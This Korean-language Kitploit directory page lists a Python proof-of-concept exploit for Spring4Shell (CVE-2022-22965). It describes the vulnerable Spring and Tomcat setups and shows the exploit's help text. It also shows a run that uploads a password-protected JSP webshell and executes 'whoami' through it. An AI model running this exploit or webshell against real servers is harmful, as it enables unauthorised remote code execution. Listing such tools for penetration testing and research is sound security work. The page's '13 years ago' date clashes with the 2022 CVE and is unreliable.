Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Spring4Shell-CVE-2022-22965 — # CVE-2022-22965(Spring4Shell)용 Python 기반 개념 증명 익스플로잇 Apache Tomcat에서 실행되는 Java Spring Core RCE를 대상으로 합니다. 원격 명령 실행을 위해 비밀번호 보호 기능이 있는 JSP 웹셸을 업로드합니다. | Kitploit
도구/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

# CVE-2022-22965(Spring4Shell)용 Python 기반 개념 증명 익스플로잇 Apache Tomcat에서 실행되는 Java Spring Core RCE를 대상으로 합니다. 원격 명령 실행을 위해 비밀번호 보호 기능이 있는 JSP 웹셸을 업로드합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
13년 전아직 검토되지 않음

Spring4Shell: CVE-2022-22965 RCE

Java Spring 프레임워크 RCE 취약점

이 취약점들은 프레임워크의 핵심인 "Spring Core" 구성 요소에 영향을 미칩니다.

현재 취약점 조건:-

  • JDK 9+
  • Spring Framework의 취약한 버전 (<5.2 | 5.2.0-19 | 5.3.0-17)
  • WAR로 패키징된 Spring 애플리케이션의 서버로 Apache Tomcat 사용
  • Spring Framework의 spring-webmvc 및/또는 spring-webflux 구성 요소에 대한 의존성

익스플로잇

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
도구 다운로드